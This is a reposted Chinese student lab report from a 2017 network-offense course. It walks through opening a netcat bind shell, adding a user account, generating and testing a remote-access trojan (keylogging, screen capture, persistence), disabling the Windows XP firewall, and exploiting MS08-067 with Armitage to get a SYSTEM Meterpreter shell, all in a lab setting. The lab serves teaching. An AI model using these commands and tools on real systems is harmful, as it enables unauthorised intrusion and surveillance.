实验四网络对抗技术

Posted

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了实验四网络对抗技术相关的知识,希望对你有一定的参考价值。

中国人民公安大学

Chinese people’ public security university

 

网络对抗技术

实验报告

 

实验四

恶意代码技术

 

 

 

学生姓名

    武国瑞

年级

2014级

区队

 一区队

指导教师

 高见

 

 

信息技术与网络安全学院

201710月23

 

实验任务总纲

2016—2017 学年   学期

一、实验目的

1.通过对木马的练习,使读者理解和掌握木马传播和运行的机制;通过手动删除木马,掌握检查木马和删除木马的技巧,学会防御木马的相关知识,加深对木马的安全防范意识。

 

2.了解并熟悉常用的网络攻击工具,木马的基本功能;

3.达到巩固课程知识和实际应用的目的。

二、实验要求

1.认真阅读每个实验内容,需要截图的题目,需清晰截图并对截图进行标注和说明。

2.文档要求结构清晰,图文表达准确,标注规范。推理内容客观、合理、逻辑性强。

3.软件工具可使用NC、MSF等。

4.实验结束后,保留电子文档。

三、实验步骤

1.准备

提前做好实验准备,实验前应把详细了解实验目的、实验要求和实验内容,熟悉并准备好实验用的软件工具,按照实验内容和要求提前做好实验内容的准备。

2.实验环境

描述实验所使用的硬件和软件环境(包括各种软件工具);

开机并启动软件office2003或2007、浏览器、加解密软件。

3.实验过程

1)启动系统和启动工具软件环境。

2)用软件工具实现实验内容。

4.实验报告

按照统一要求的实验报告格式书写实验报告。把按照模板格式编写的文档嵌入到实验报告文档中,文档按照规定的书写格式书写,表格要有表说图形要有图说。

 

任务一 利用NC控制电脑

 

 NetCat,具有网络军刀之称,它小巧精悍且功能强大,说它小巧精悍,是因为他的软件大小现在已经压缩到只有十几KB,而且在功能上丝毫不减。

 

实验过程需要两个同学相互配合完成:

 

步骤一:

  在受害者的机器 (同学A)

输入下面的命令:
  nc.exe -l -p port -e cmd.exe   进入监听模式

 

被攻击者的ip为192.168.42.87

攻击者的ip为192.168.42.88

 

 


步骤二:
  在攻击者的机器.
输入下面的命令:
  nc ip  port //连接victim_IP,然后得到一个shell。 (需要截图)

 技术分享

 

 

 

 

步骤三:

 

    在shell中,利用net user 用户名 密码 /add ,添加一个用户,并在受害者的机器中使用 net user 命令进行验证。(需要截图)

 技术分享

 

 可以继续通过命令行做一些事情。

 

任务二 利用木马控制电脑

 

实验过程需要两个同学配合:

 

步骤一:

 

    攻击者的机器. (同学A)
打开V2014.exe程序或则star RAT,这两个木马功能类似。

 技术分享

 

 

 


步骤二:
  点击菜单栏中的“服务生成”,在弹出的配置服务端中,配置回IP地址(攻击者IP)和端口号,并点击“生成”按钮,生成木马服务端。

 技术分享

 

 

 

 

步骤三:

 

将生成的木马可执行程序拷贝到受害者的机器,并双击运行。 

步骤四:

 

在控制端中查看木马上线情况,并对以下功能每个进行测试和截图。 

 

步骤四:

 

在控制端中查看木马上线情况,并对以下功能每个进行测试和截图。 

 

  1. 文件管理,尝试拷贝文文件管理
  2. 技术分享
  3. 屏幕控制,尝试获取桌面
  4. 技术分享

     

  5. 键盘记录,尝试获取对方击键记录
  6. 技术分享

     

  7. 会话管理,重启对方机器,查看是否能自启动上线
  8. 技术分享

     

 

会话管理,卸载对方的木马。

 

任务三 通过漏洞获取shell(合天平台中做) 所有过程截图写博客

1.查看XPSP3漏洞主机的登录用户及网络配置信息,从下图2可以看出漏洞主机IP为10.1.1.130。使用命令如下: 

       ipconfig 查看网络配置信息,为了更好的演示攻击xp系统实例需要关闭XP系统的防火墙,win+R输入cmd

      运行命令:netsh firewall set opmode mode=disable

 技术分享

 

 

 

2.查看攻击者主机登陆用户及网络配置信息,从下图3可以看出攻击主机登陆用户为root,IP为10.1.1.128 

      whoami  查看当前登陆用户

      ifconfig 查看网络配置信息

 

 技术分享

 

 

 

 

 

3.  Metasploit默认使用PostgreSQL存储渗透测试所需的数据表,所以在启动Armitage之前需要首先启动PostgreSQL服务和Metasploit服务,然后再启动armitage,弹出对话框询问是否连接Metasploit的RPC信道,依次选择“connect”、“是”选项。Armitage启动成功后主界面如下图7所示:

      service postgresql start 启动PostgreSQL服务

      service metasploit start 在另一个终端启动Metasploit服务

      armitage 启动Armitage

 技术分享

 

 

4. 利用Armitage对目标系统进行扫描

     扫描目标网段完整信息,确认目标网络拓扑结构是网络侦查的重要实施方法。依次选择Host-Nmap Scan-Quick Scan(OS detect),弹出对话框填写目标主机所在的10.1.1.0/24。 扫描结果如图3所示,10.1.1.0/24网段一共还存在三台主机,其中10.1.1.130是所重点关注的目标主机。

 

 技术分享

技术分享

 

 

5. Armitage利用MS08_067漏洞攻击XP主机

      完成对目标主机的攻击模块搜索以后,选中10.1.1.130主机右键可以发现多了Attack菜单。这里选择SMB漏洞对XP目标主机进行攻击,依次选择Attack》smb》ms08_067_netapi菜单。

技术分享

 

 技术分享

 

   6.攻击完成后,目标主机的图标会发生明显变化,Armitage会自动建立一个驻留在内存的shellcode 也就是Meterpreter,右键打开Meterpreter shell,输入getuid命令查看当前用户的权限是SYSTEM权限,攻击完成。

 技术分享

技术分享

 
 
 
好文要顶 关注我 收藏该文 技术分享 技术分享
0
0
 
 
 
上一篇:实验三密码破解技术
posted @ 2017-10-23 20:43 p201421410017 阅读(8) 评论(0) 编辑 收藏
 
 



























以上是关于实验四网络对抗技术的主要内容,如果未能解决你的问题,请参考以下文章

网络对抗技术实验四

网络对抗技术 实验报告四

网络对抗技术_实验四_恶意代码技术

网络对抗技术_实验四_恶意代码技术

网络对抗技术_实验四_恶意代码技术

2017-2018-2 20155228 《网络对抗技术》 实验四:MSF基础应用